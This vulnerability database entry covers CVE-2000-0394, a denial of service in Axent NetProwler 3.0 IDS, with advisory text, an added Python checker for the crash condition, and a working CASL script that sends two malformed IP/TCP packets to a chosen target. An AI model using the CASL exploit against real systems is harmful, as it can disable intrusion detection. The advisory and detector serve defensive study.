Axent NetProwler Malformed IP Packet DoS Vulnerability

Vulnerability ID: 1105844    Type: Other
Published: 2000-05-18    Updated: 2005-05-02
CVE ID: CVE-2000-0394
CNNVD ID: CNNVD-200005-072
Platform: Windows    CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/19941
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-072
|Details
NetProwler 3.0 is vulnerable to a denial of service: a remote attacker can crash it by sending a malformed IP packet that triggers NetProwler's Man-in-the-Middle signature.
|Exploit
source: http://www.securityfocus.com/bid/1225/info
 
Axent NetProwler 3.0 IDS is vulnerable to a malformed packet attack. It will crash if the Man-in-the-Middle signature encounters a packet for which the following expression is true:
(IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH
 
According to the Axent security team, this is not a fragmented-packet issue as reported in RFP2K05 by Rain Forest Puppy.
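
The crash expression above is the check a robust decoder must make before it trusts either header: the declared IP header length (IHL) plus the declared TCP header length (data offset) must not exceed the declared IP total length, and none of the three may be used to index into the buffer until that holds. The following Python is an added example, not part of the advisory or of the CASL script on this page. It builds its own IPv4/TCP SYN packets (constructed here, with 192.0.2.x documentation addresses, zeroed checksums and invented ports; they are not the packets the CASL script sends) and evaluates the expression over them, returning None where it cannot be evaluated (non-TCP, a non-first fragment, or a buffer too short to read the fields) rather than reading past the end.

```python
"""Evaluate the NetProwler crash condition on raw IPv4/TCP packets:
    (IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH
Added example: packets, addresses (192.0.2.x) and ports are constructed
here for illustration and are not taken from the advisory."""
import struct
from ipaddress import IPv4Address
from typing import Optional

IPPROTO_TCP = 6


def build_ipv4_tcp(total_length: Optional[int] = None, ihl: int = 5, tcp_doff: int = 5,
                   frag_offset: int = 0, more_fragments: bool = False,
                   proto: int = IPPROTO_TCP,
                   src: str = "192.0.2.1", dst: str = "192.0.2.2",
                   payload: bytes = b"") -> bytes:
    """Build an IPv4+TCP SYN packet for feeding a decoder (checksums left at zero).

    `total_length`, `ihl` and `tcp_doff` are written into the headers exactly as
    given, so a caller can make the declared lengths disagree with each other,
    which is the inconsistency the advisory describes."""
    if total_length is None:
        total_length = ihl * 4 + tcp_doff * 4 + len(payload)
    flags_frag = (0x2000 if more_fragments else 0) | (frag_offset & 0x1FFF)
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         (4 << 4) | ihl, 0, total_length, 0x1234, flags_frag,
                         62, proto, 0,
                         IPv4Address(src).packed, IPv4Address(dst).packed)
    ip_hdr += b"\x00" * (ihl * 4 - 20)          # pad to the declared IHL (no real options)
    tcp_hdr = struct.pack("!HHIIBBHHH", 1026, 2058, 2542901, 0,
                          tcp_doff << 4, 0x02, 768, 0, 0)   # flags byte 0x02 = SYN
    tcp_hdr += b"\x00" * (tcp_doff * 4 - 20)    # pad to the declared data offset
    return ip_hdr + tcp_hdr + payload


def header_lengths_exceed_total(pkt: bytes) -> Optional[bool]:
    """Return True when IHL*4 + data_offset*4 > total_length, False when not,
    and None when the expression cannot be evaluated safely: not IPv4/TCP,
    a non-first fragment (only the first fragment carries the TCP header),
    or a buffer shorter than the fields that must be read. Every index is
    checked against len(pkt) before use; the declared lengths are never trusted."""
    if len(pkt) < 20:
        return None
    ver_ihl, _tos, total_length, _ident, flags_frag, _ttl, proto = \
        struct.unpack("!BBHHHBB", pkt[:10])
    if ver_ihl >> 4 != 4 or proto != IPPROTO_TCP:
        return None
    ip_hlen = (ver_ihl & 0x0F) * 4
    if ip_hlen < 20:
        return True     # IHL below the fixed header size: reject before any TCP parsing
    if flags_frag & 0x1FFF:
        return None     # fragment offset != 0: no TCP header in this fragment
    doff_index = ip_hlen + 12        # TCP data-offset byte sits 12 bytes into the TCP header
    if doff_index >= len(pkt):
        return None
    tcp_hlen = (pkt[doff_index] >> 4) * 4
    return ip_hlen + tcp_hlen > total_length


if __name__ == "__main__":
    samples = [
        ("consistent lengths", build_ipv4_tcp(payload=b"abcd")),
        ("total_length too small", build_ipv4_tcp(total_length=36)),
        ("oversized data offset", build_ipv4_tcp(tcp_doff=15, total_length=40)),
        ("non-first fragment", build_ipv4_tcp(frag_offset=3, more_fragments=True)),
    ]
    for label, pkt in samples:
        print(f"{label:24s} -> {header_lengths_exceed_total(pkt)}")
```

A decoder that enforces this check drops or flags the packet (and logs the three declared values) instead of computing a TCP header pointer from them; the None results are the cases where a signature engine must not attempt TCP parsing at all.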
 
In addition, NetProwler uses the Microsoft JET engine 3.5 to store incoming alert information. More information on the Microsoft JET engine 3.5 vulnerability can be found at:

http://www.securityfocus.com/bid/286

#include "tcpip.casl"
#include "packets.casl"

// The script takes the source and destination hosts as its two arguments
// and resolves them to IP addresses.
Src = pop args;
Dst = pop args;

Src = getip(Src);
Dst = getip(Dst);

// Packet 1: a 20-byte IPv4 header whose total-length field (36) is smaller
// than the bytes that follow it, with a non-zero fragment offset, carrying a
// TCP SYN whose data-offset field is 0 and whose reserved bits are non-zero.
iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;          // IHL in 32-bit words (20 bytes)
iph.ip_tos = 0;
iph.ip_length = 36;            // declared IP total length
iph.ip_id  = 2233;
iph.ip_offset = 3;             // fragment offset, in 8-byte units
iph.ip_ttl = 62;
iph.ip_protocol = 6;           // TCP
iph.ip_cksum = 38648;          // checksum value as in the original script
iph.ip_source = Src;
iph.ip_destination = Dst;

tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;            // TCP data offset of 0 words: no valid header length
tch.tcp_x2 = 1;                // reserved bits, non-zero
tch.tcp_syn = 1;
tch.tcp_window = 768;

pk1data = "\x00\x00\x00\x00\x00\x00";    // six bytes of zero padding

packet = [ iph, tch, pk1data ];

ip_output(packet);

// Packet 2: the same construction with the More-Fragments flag set and a
// SYN to port 21 carrying a TCP MSS option.
iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;           // declared IP total length
iph2.ip_id = 2239;
iph2.ip_mf = 1;                // More-Fragments flag
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;         // checksum value as in the original script
iph2.ip_source = Src;
iph2.ip_destination = Dst;

tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;              // reserved bits, non-zero
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;        // checksum value as in the original script

pk2data = "\x02\x04\x05\xb4\x00\x00";    // TCP MSS option (kind 2, len 4, MSS 1460) plus padding

packet = [ iph2, tch2, pk2data ];

ip_output(packet);
|References

Source: BUGTRAQ
Name: 20000522 RFP2K05 - NetProwler "Fragmentation" Issue
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg=[email protected]
Source: BID
Name: 1225
Link: http://www.securityfocus.com/bid/1225
Source: BUGTRAQ
Name: 20000519 RFP2K05: NetProwler vs. RFProwler
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=95878603510835&w=2
